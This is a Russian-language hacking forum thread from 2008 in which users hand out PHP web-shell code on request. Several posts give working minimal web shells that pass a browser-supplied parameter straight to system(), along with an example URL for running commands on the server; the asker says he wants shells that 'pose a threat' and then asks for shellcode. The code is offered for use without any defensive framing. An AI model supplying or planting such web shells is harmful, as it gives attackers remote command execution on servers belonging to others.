Скрипт шелла

Discussion in 'PHP' started by ZEXEL, 10 Jan 2008.

  1. ZEXEL

    ZEXEL Elder - Старейшина

    Joined:
    7 Jan 2008
    Messages:
    351
    Likes Received:
    193
    Reputations:
    3
    Дайте ктото скрипт нормального шелла
     
    #1 ZEXEL, 10 Jan 2008
  2. __mad

    __mad Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    100
    Likes Received:
    38
    Reputations:
    7
    Code:
    <HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?
if($_GET['cmd']) {
  system($_GET['cmd']);
  }
?>
</pre>
</BODY></HTML>
     
    #2 __mad, 10 Jan 2008
  3. ZEXEL

    ZEXEL Elder - Старейшина

    Joined:
    7 Jan 2008
    Messages:
    351
    Likes Received:
    193
    Reputations:
    3
    И что через етот шелл можна делать ?
     
    #3 ZEXEL, 10 Jan 2008
  4. FraiDex

    FraiDex Elder - Старейшина

    Joined:
    16 Jun 2006
    Messages:
    193
    Likes Received:
    68
    Reputations:
    -11
    ну мир с помощью его ты не перевернёш. но команды в ОС выполнять точно сможеш.. (если safe_mode=off)
     
    #4 FraiDex, 10 Jan 2008
  5. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    Я бы упростил)))
    файл cmd.php
    Code:
    <? system($cmd); ?>
    Дает доступ к командной строке, допустим сервак на винде. Обращаемся к скрипту через броузер:
    Code:
    http://site/path/cmd.php?cmd=dir
    --выдаст содержимое директории. Так же можно выпонлять и все другие команды командной строки, если хватит прав.
     
    #5 AFoST, 10 Jan 2008
    1 person likes this.
  6. ZEXEL

    ZEXEL Elder - Старейшина

    Joined:
    7 Jan 2008
    Messages:
    351
    Likes Received:
    193
    Reputations:
    3
    Да просто system на сервере делать нельзя, потому и шел етот безполезен в моем случаии !
    а какие еще есть шеллы что бы представляли угрозу?
     
    #6 ZEXEL, 10 Jan 2008
  7. FraiDex

    FraiDex Elder - Старейшина

    Joined:
    16 Jun 2006
    Messages:
    193
    Likes Received:
    68
    Reputations:
    -11
    немного подправлю...
    PHP:
    <? system($_GET['cmd']) ?>
    так немного правельнее ;)
     
    #7 FraiDex, 10 Jan 2008
  8. FraiDex

    FraiDex Elder - Старейшина

    Joined:
    16 Jun 2006
    Messages:
    193
    Likes Received:
    68
    Reputations:
    -11
    Zexel, ты хоть знаеш что такое шелл и для чего он?
    может те шелл-коды нужны?
     
    #8 FraiDex, 10 Jan 2008
  9. V1k

    V1k Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    38
    Likes Received:
    32
    Reputations:
    13
    #9 V1k, 10 Jan 2008
  10. ZEXEL

    ZEXEL Elder - Старейшина

    Joined:
    7 Jan 2008
    Messages:
    351
    Likes Received:
    193
    Reputations:
    3
    Да, шел коды !
     
    #10 ZEXEL, 10 Jan 2008
  11. ZEXEL

    ZEXEL Elder - Старейшина

    Joined:
    7 Jan 2008
    Messages:
    351
    Likes Received:
    193
    Reputations:
    3
    Спасибо за ссылку, теперь всё !
     
    #11 ZEXEL, 10 Jan 2008
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.